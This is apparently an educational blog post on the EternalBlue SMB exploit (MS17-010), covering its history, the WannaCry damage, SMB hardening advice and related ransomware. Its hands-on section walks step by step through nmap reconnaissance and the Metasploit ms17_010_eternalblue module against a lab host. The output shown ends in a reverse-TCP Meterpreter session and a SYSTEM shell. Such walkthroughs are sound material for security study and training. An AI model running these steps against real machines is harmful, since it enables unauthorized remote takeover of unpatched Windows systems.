EternalBlue — Windows’s Kryptonite
Overview of the EternalBlue
“The Shadow Brokers” gang released their fifth leak on 14th April 2017, “Lost in Translation,” which contained the Eternal Blue exploitation tool.
Before Windows 8, Eternal Blue is compatible with all versions of Windows. The inter-process communication share (IPC$) in these versions supports null sessions. This indicates that the connection is made via an anonymous login, and a null session is, by default, permitted. The server will accept a variety of commands from clients using null sessions.
Fuzz Bunch, a framework made by the NSA, was a key asset for the well-known WannaCry ransomware to wreak havoc on the world. This framework’s function is to configure, for instance, set the victim’s IP address and run the exploitation tools.
Under the heading of MS17–010 (Microsoft Security Bulletin), Microsoft published patches for the flaws in the leak.
The CVE ID in MS17–010 that is connected to EternalBlue is CVE-2017–0144.
Impact of the Attack
The EternalBlue assault had a tremendous effect and extensively damaged many different industries. Some of the effects are as follows:
Attacks Using Ransomware: Cybercriminals utilized the EternalBlue exploit to spread ransomware, a type of malware that encrypts a victim’s files and requests payment for the decryption key. One of the most notable ransomware operations using the EternalBlue bug was the WannaCry ransomware outbreak, which impacted over 200,000 machines in 150 countries.
Financial Losses: The EternalBlue attack resulted in huge financial losses. Over $8 billion is thought to have been spent by businesses and organizations worldwide due to the WannaCry ransomware assault alone.
Critical Infrastructure Damage: Hospitals and transport systems were among the critical infrastructure targets of the EternalBlue hack.
Root cause and motive behind the EternalBlue
- This attack was made possible through a flaw in the Server Message Block (SMB) protocol of Microsoft’s Windows operating system, significantly. Without user involvement, this flaw permitted attackers to run arbitrary code on a remote machine.
- The SMB protocol is used between computers to transfer files, printers, and other resources. Due to a bug in the SMB protocol, attackers could deliver specially created packets to the intended machine, taking advantage of a buffer overflow to run malicious code. The US National Security Agency (NSA), which made the exploit as part of its cyberespionage activities, was the organization that first identified this vulnerability. But in 2017, a gang of hackers known as the Shadow Brokers released the exposure.
- The EternalBlue assault was primarily carried out for financial gain. The EternalBlue exploit was used by the WannaCry ransomware assault to infect and encrypt data on tens of thousands of machines worldwide and demand payment in return for the decryption key. Millions of dollars in ransom payments are thought to have been made by the perpetrators who carried out the incident.
- The attackers quickly and autonomously propagated the virus via a worm-like propagation method, infecting susceptible PCs in minutes. The attackers could widely disseminate the ransomware using this dissemination technique, resulting in extensive disruption and considerable financial losses. Additionally, the perpetrators of the EternalBlue assault took advantage of the fact that several businesses were still utilizing obsolete, unpatched operating systems. This emphasizes the importance of updating the software regularly because they frequently include vital security patches and bug fixes.
- In conclusion, the EternalBlue assault was a seriously harmful hack that used a flaw in the Windows operating system Microsoft. The criminals disseminated the ransomware widely using a technique like a worm since their primary motivation was financial gain. The need for regular software upgrades and patch management is brought home by this assault.
Hands On How To Do This Kind Of Attack
Step 1) First, we will find our target’s open ports and the services running at that port with their version. For that, we will be using Nmap with flags:- -p(it is used to scan specified port range or for single port only), -T5(it is used for fast scanning), -A(it is used for scanning OS, version scanning, script scanning and traceroute).
┌──(root㉿evil)-[/home/evil]
└─# nmap -p 0-1000 -T5 -A 10.10.90.73
Starting Nmap 7.93 ( <https://nmap.org> ) at 2023-04-23 05:05 IST
Warning: 10.10.90.73 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.90.73
Host is up (0.21s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows 8.1 (96%), Microsoft Windows 8.1 Update 1 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -3h49m59s, deviation: 2h53m12s, median: -5h30m00s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\\\\x00
| Workgroup: WORKGROUP\\\\x00
|_ System time: 2023-04-22T13:06:00-05:00
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02e983fc6527 (unknown)
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-22T18:06:00
|_ start_date: 2023-04-22T18:04:35
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 360.82 ms 10.9.0.1
2 360.76 ms 10.10.90.73
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 34.22 secondsStep 2) After scanning the target host, we need to find the vulnerability on that host. We will again use Nmap with the flags:- -p, — script=vuln(this will find the vulnerability of services of open ports.).
──(root㉿evil)-[/home/evil]
└─# nmap -p 139 --script=vuln 10.10.90.73
Starting Nmap 7.93 ( <https://nmap.org> ) at 2023-04-23 21:55 IST
Nmap scan report for 10.10.90.73
Host is up (0.60s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>
| <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>
|_ <https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
Nmap done: 1 IP address (1 host up) scanned in 22.05 secondsFrom the above scan, it is clear that the target host is vulnerable, and the vulnerable service is Microsoft-ds because the vulnerability is related to Microsoft SMBv1 servers (ms17–010) at port 445. hence port 445 is vulnerable.
Step 3) Open msfconsole by simply typing msfconsole in the terminal. Then type search ms17–010 in the interface.
┌──(root㉿evil)-[/home/evil]
└─# msfconsole
=[ metasploit v6.2.23-dev ]
+ -- --=[ 2259 exploits - 1188 auxiliary - 402 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Enable verbose logging with set VERBOSE
true
Metasploit Documentation: <https://docs.metasploit.com/>
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rceStep 4) From the above result, option 0 is the one in which we are interested because our target machine is vulnerable to the eternal blue exploit. Then type use 0 in the terminal and give the command “set RHOSTS 10.10.90.73” to set the remote host IP address. And then give the command “exploit”, which will connect us with the target.
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.90.73
RHOSTS => 10.10.90.73
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.9.70.230:4444
[*] 10.10.90.73:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.90.73:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.90.73:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.90.73:445 - The target is vulnerable.
[*] 10.10.90.73:445 - Connecting to target for exploitation.
[+] 10.10.90.73:445 - Connection established for exploitation.
[+] 10.10.90.73:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.90.73:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.90.73:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.90.73:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.90.73:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.90.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.90.73:445 - Trying exploit with 22 Groom Allocations.
[*] 10.10.90.73:445 - Sending all but last fragment of exploit packet
[*] 10.10.90.73:445 - Starting non-paged pool grooming
[+] 10.10.90.73:445 - Sending SMBv2 buffers
[+] 10.10.90.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.90.73:445 - Sending final SMBv2 buffers.
[*] 10.10.90.73:445 - Sending last fragment of exploit packet!
[*] 10.10.90.73:445 - Receiving response from exploit packet
[+] 10.10.90.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.90.73:445 - Sending egg to corrupted connection.
[*] 10.10.90.73:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.10.90.73
[*] Meterpreter session 1 opened (10.9.70.230:4444 -> 10.10.90.73:49182) at 2023-04-23 22:45:24 +0530
[+] 10.10.90.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.90.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.90.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > shell
Process 688 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\\\\Windows\\\\system32>whoami
whoami
nt authority\\\\system
C:\\\\Windows\\\\system32>hostname
hostname
Jon-PC
C:\\\\Windows\\\\system32>By simply typing the shell, we will get the shell of the target’s shell, or to put it, we are inside the target machine.
Best Practice to Protect from Such Kind of Attack
To maintain the security of your system and data, taking necessary measures to prevent potential threats from exploiting vulnerabilities in the Server Message Block (SMB) protocol is crucial. Here are some important steps to secure your SMB environment:
Update and Patch
Regularly update and patch your systems, especially those running SMBs. This will ensure the latest security fixes and any known vulnerabilities are addressed.
Block SMB at the Network Level
Consider blocking SMB at the network level so it is not accessible from the internet or other untrusted networks. This will help to prevent unauthorized access and attacks from malicious actors.
Restrict and Protect SMBs at the Host Level
If SMB is necessary for your environment, consider restricting and protecting it at the host level. This can be achieved by disabling unnecessary SMB services, configuring access controls and firewalls, and implementing security best practices such as strong passwords and multi-factor authentication.
Use Secure Authentication Methods for SMB
To enhance the security of your SMB environment, it is recommended to use secure authentication methods such as Kerberos or NTLMv2. These methods provide stronger authentication and are less susceptible to attacks than older, less secure methods.
Protect Data and Use Encryption for SMB
It is important to use encryption to protect sensitive data that is transferred over SMBs. This can be achieved by enabling SMB encryption or using a virtual private network (VPN) to secure SMB traffic.
By following these steps, you can help to secure your SMB environment and protect your data from potential threats.
Similar Kind of Attack
It’s June 2017, just a month after WannaCry wreaked havoc. Along comes NotPetya, the cool kid on the block, also known as ExPetr or Petya. NotPetya is like the rebellious teenager of ransomware, using the EternalBlue exploit and its partner in crime, EternalRomance, to spread across networks like a wildfire at a bonfire party. Talk about crashing the Windows party scene!
But wait, there’s more! In October 2017, another troublemaker shows up — Bad Rabbit. It’s like the mischievous sibling of NotPetya, using the same EternalRomance exploit to pull off its ransom attack. But instead of tempting victims with a flashy dance move, Bad Rabbit poses as a fake Adobe Flash update, sneaky little rascal! It’s all fun and games until your files end up encrypted like a secret code only a hacker can crack.
And then there’s Emotet, the OG of banking Trojans, who has been causing mayhem since 2014. Emotet is like the cunning thief who knows all the tricks of the trade, including using EternalBlue to spread through phishing emails and malicious attachments. It’s like the smooth operator of the cybercrime world, making its way into systems with a slick charm that would make James Bond jealous.
So there you have it — a cyber attack party featuring NotPetya, Bad Rabbit, and Emotet, all using similar techniques like EternalBlue to crash the system and have their malicious fun. It’s like a wild ride straight out of a hacker movie, complete with exploits, vulnerabilities, and ransomware shenanigans. Stay updated, keep your defenses strong, and watch out for these cyber troublemakers, folks! Cue hacker movie soundtrack
References
https://www.hypr.com/security-encyclopedia/eternalblue
https://en.wikipedia.org/wiki/EternalBlue
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/
Contribution
Writers:-
Akshay Raj | Sudoer
Mehul Dadlani | Binary
Nasir Hussain | Binary
Gurupreet Singh | Binary
Khushi Tiwari | Binary
Nawnit Singh | Binary
Designers:-
Abhinav Shandilya | Sudoer
Omar Ansari | Sticky Bit
